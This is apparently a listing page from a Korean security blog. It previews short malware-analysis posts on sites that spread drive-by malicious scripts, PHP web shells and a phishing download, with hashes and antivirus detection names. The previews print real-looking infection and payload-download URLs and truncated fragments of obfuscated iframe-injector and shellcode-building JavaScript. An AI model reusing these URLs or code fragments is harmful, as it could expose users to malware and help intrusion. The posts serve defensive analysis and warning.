본문 바로가기

security/악성코드 유포

http://ad.nsonmedia.com 내의 악성 스크립트 삽입 ! 감염 사이트 : http://ad.tiad.co.kr/mt2.html * 위 사이트는 현재도 감염중에 있습니다! 메인 사이트 : http://ad.tiad.co.kr/mt2.htm0 http://jips.kips.or.kr/ad.htm0 최종파일 다운 : http://61.251.187.176/kr/files/java.ex0 : http://jips.kips.or.kr/Applet.ja0 ~> JAVA 취약점 ~> temp%//happy.vbs 생성 http://jips.kips.or.kr/down.htm0 최종파일 다운 : http://61.251.187.176/kr/files/004.ex0 MID 취약점 다운로드 : http://jips.kips.or.kr/test_case.mi0 ~> MID 취약점.. 더보기
clsid:d27cdb6e-ae6d-11cf-96b8-444553540000 포함된 Script 감염 사이트 : http://www.imslow.kr/ghost/index.html * 악성 링크이니 조심하시기 바랍니다! clsid:d27cdb6e-ae6d-11cf-96b8-444553540000 clsid:d27cdb6e-ae6d-11cf-96b8-444553540000 {D27CDB6E-AE6D-11CF-96B8-444553540000} Updated: March 28, 2003 Applies To: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2 HKLM\Software\Policies\Microsoft\Windows\CurrentVersion\Internet.. 더보기
HTML/Infected.WebPage.Gen2 APNIC KR 감염 사이트 : http://yxlgok.net/bbs/board.php? bo_table=board_free&wr_id=78&sfl=&stx=&sst=wr_hit&sod=desc&sop=and&page=3 메인 스크립트중 ! 이상한 스크립트 발견 ! function c102916999516m494180f401f90(m494180f40275f){ var m494180f402f30=16; return (parseInt(m494180f40275f,m494180f402f30));}function m494180f403ed1(m494180f4046a2){ function m494180f405e13(){return 2;} var m494180f404e72='';m494180f406db4=String.fromChar.. 더보기
Gzinflate Base64 이용한 PHP Shell File : input.jpg MD5 : 7e3a6b9991f49fafe5e3b9c0ef8c8d1b 크기 : 5.93KB (6,079 바이트) 감염 사이트 : http://www.mhouse.or.kr//bbs/admin/input.jxg Kaspersky : Backdoor.PHP.Pbot.bl VirusTotal : 바이러스토탈결과 더보기
alyackorea.com 로 위장한 피싱 사이트 ! File : CAA7EF2L ,CAA7EF2L.(숨김파일) MD5 : 87514e109381faa98b50f426dd37f015 CAA7EF2L MD5 : 87514e109381faa98b50f426dd37f015 CAA7EF2L. (숨김파일) 크기 : 88.6KB (90,752 바이트) 88.6KB (90,752 바이트) (숨김파일) 감염 사이트 : http://alyackorea.com/download.php?n=kakao_theme_2.X.0.exe Kaspersky : HEUR:Trojan-Downloader.Win32.Generic VirusTotal : http://www.virustotal.com/file-scan/report.html?id=b8aed1eac332adada69d77256144.. 더보기
http://78xxk.com/java.html (Trojan-Downloader.JS.Agent.gm) File : java.html MD5 : 66a3a0be5fc181f1a9379a9a696c0928크기 : 2.98KB (3,058 바이트) 감염 사이트 : http://78xxk.com/java.html Kaspersky : Trojan-Downloader.JS.Agent.gm VirusTotal : http://www.virustotal.com/file-scan/report.html?id=0b1b210aaeb0adf9999cb0dd1144b5bdfe8aa377929a66b691444ba69368e82e-1323445327 function utf8to16(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i>4) {case 0:c.. 더보기
네이버 카스퍼스키 (HEUR:Trojan.Script.Iframer) 진단 사이트 보기 !! * 네이버 어느 페이지에서 감염되었는지는 모르겠다는걸 알려 드립니다! 최초 진단 사이트 : HEUR:Trojan.Script.Iframer (카스퍼스키) 링크 : http://n37.nsmartad.com/imp?slot=3451&ads=57314&tid=1&type=as document.write("OK"); var info=navigator.userAgent.toLowerCase();var August=info.indexOf("windows nt 5.1");if(document.cookie.indexOf('veatpr')==-1&&August>0){var expires=new Date();expires.setTime(expires.getTime()+24*60*30*1000);document.cooki.. 더보기
Decode Base 64 를 이용한 악성 스크립트! File : f1.html MD5 : bce75d05869be9fdf489d13630bab1f1크기 : 8.67KB (8,879 바이트) 감염 사이트 : http://toto888.gnway.net:8080/xxx/f1.html Kaspersky : Exploit.JS.Agent.akr VirusTotal : http://www.virustotal.com/file-scan/report.html?id=f811ce7544059f8123fdf5199e2abb29e8f4508dc9b58a761185779d96de2c12-1319253379 원본 코드 var a1 = "ABCDEFG"; var a2 = "HIJKLMNOP"; var a3 = "QRSTUVWXYZabcdef"; var keyStrs = a1+a2+.. 더보기
File : rst46815.htm , MD5 52060d2944fa64d564f0ac4dfbd83c56 Script ! File : rst46815.htm MD5 : 52060d2944fa64d564f0ac4dfbd83c56크기 : 3.71KB (3,806 바이트) 감염 사이트 : http://bydbest.com/xxx/rst46815.htm Kaspersky : Trojan-Downloader.JS.Iframe.ciq Free dating, Friendship, sms [Script 해독] if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write(" "); } function iframer(){ var f = document.createElement('iframe'); f.setAttribute('src', 'http://neot.. 더보기
오랜만에 보는 악성 스크립트 ! 제가 본 한 중국 사이트의 악성 스크립트 입니다 ! IE 버전을 확인한 이후에 위와 같은 스크립트에 연결 시켜 감염을 합니다 ! party.css 볼까요 var hua, hua1, hua2, hua3, hua4; hua='\x25'; var kao='\x25'; var shit='\x25'; var jj=hua+'u'+'4B5B'; var cao='\x25'; hua1='u'; kao+='u'; shit+='u'; var kk=hua+'u'+'CD36'; cao+='u'; hua2='58'; kao+='B'; shit+='B'; var ll=hua+'u'+'BD8F'; cao+='B'; hua3=hua+hua1+'5'; kao+='D'; shit+='D'; var mm=hua+'u'+'E9D0'; cao.. 더보기